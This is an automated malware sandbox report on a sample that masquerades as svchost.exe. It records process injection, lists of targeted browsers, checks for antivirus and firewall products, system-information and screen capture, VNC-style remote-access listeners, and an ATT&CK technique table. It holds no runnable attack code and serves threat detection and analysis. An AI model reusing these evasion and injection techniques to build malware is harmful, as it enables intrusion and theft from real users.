    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 675000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D30000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D31000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D32000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D85000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 10F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 10F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 10F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1145000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1620000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1621000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1622000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1675000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A70000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A71000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A72000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: AC5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: B80000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: B81000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: B82000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: BD5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: F50000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: F51000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: F52000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FA5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FD0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FD1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FD2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1025000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1335000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DD0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DD1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DD2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E25000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 2_2_02BC78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 5_2_008E78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 6_2_008978A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 9_2_02BE78A0
    Source: C:\Users\user\Desktop\arxtPs1STE.exe File opened: CA HIPS KmxAgent
    Source: C:\Users\user\Desktop\arxtPs1STE.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
    Source: C:\Users\user\Desktop\arxtPs1STE.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
    Source: C:\Users\user\Desktop\arxtPs1STE.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Window found: AVP NULL ____AVP.Root
    Source: C:\Windows\apppatch\svchost.exe File opened: CA HIPS KmxAgent
    Source: C:\Windows\apppatch\svchost.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
    Source: C:\Windows\apppatch\svchost.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
    Source: C:\Windows\apppatch\svchost.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
    Source: C:\Windows\apppatch\svchost.exe Window found: AVP NULL ____AVP.Root
    Source: arxtPs1STE.exe, arxtPs1STE.exe, 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, arxtPs1STE.exe, 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000000.1750567152.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000006.00000000.1753855080.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000009.00000000.1760466411.0000000001370000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000000.1750567152.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000006.00000000.1753855080.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000009.00000000.1760466411.0000000001370000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
    Source: arxtPs1STE.exe, 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, arxtPs1STE.exe, 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000000.1750567152.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000006.00000000.1753855080.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000009.00000000.1760466411.0000000001370000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_00414050 cpuid 0_2_00414050
    Source: C:\Windows\apppatch\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\617d763a\debug_28;Nov;2024_17;56;23.log VolumeInformation
    Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\617d763a\scr.bmp VolumeInformation
    Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\617d763a\sysinfo.log VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402360
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BB4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle,2_2_02BB4B00
    Source: C:\Users\user\Desktop\arxtPs1STE.exe Code function: 0_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004034C0
    Source: arxtPs1STE.exe Binary or memory string: S:(ML;;NRNWNX;;;LW)

    Remote Access Functionality

    Source: arxtPs1STE.exe String found in binary or memory: RFB 003.006
    Source: svchost.exe String found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe String found in binary or memory: RFB 003.006
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02BC9E40
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BE1250 htons,socket,setsockopt,closesocket,bind,listen,2_2_02BE1250
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BE0480 setsockopt,htons,socket,setsockopt,bind,2_2_02BE0480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 5_2_00901250 htons,socket,setsockopt,closesocket,bind,listen,5_2_00901250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 5_2_00900480 setsockopt,htons,socket,setsockopt,bind,5_2_00900480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 5_2_008E9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_008E9E40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 6_2_008B1250 htons,socket,setsockopt,closesocket,bind,listen,6_2_008B1250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 6_2_008B0480 setsockopt,htons,socket,setsockopt,bind,6_2_008B0480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 6_2_00899E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_00899E40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 9_2_02C01250 htons,socket,setsockopt,closesocket,bind,listen,9_2_02C01250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 9_2_02BE9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,9_2_02BE9E40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 9_2_02C00480 setsockopt,htons,socket,setsockopt,bind,9_2_02C00480
    Techniques by tactic (cell entries in table order; a leading number is the figure shown in that cell):
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
    Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
    Execution: 22 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
    Persistence: 1 DLL Side-Loading; 1 Create Account; 1 Valid Accounts; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; 1 Bootkit; Startup Items; Scheduled Task/Job; At; Cron; Launchd
    Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 613 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron; Launchd
    Defense Evasion: 1 Disable or Modify Tools; 1 Abuse Elevation Control Mechanism; 1 Obfuscated Files or Information; 31 Software Packing; 1 DLL Side-Loading; 322 Masquerading; 1 Valid Accounts; 151 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 613 Process Injection; 1 Bootkit
    Credential Access: 111 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
    Discovery: 2 System Time Discovery; 11 Account Discovery; 1 System Network Connections Discovery; 2 File and Directory Discovery; 143 System Information Discovery; 1 Query Registry; 351 Security Software Discovery; 151 Virtualization/Sandbox Evasion; 13 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
    Lateral Movement: 1 Remote Desktop Protocol; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
    Collection: 1 Archive Collected Data; 1 Screen Capture; 111 Input Capture; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
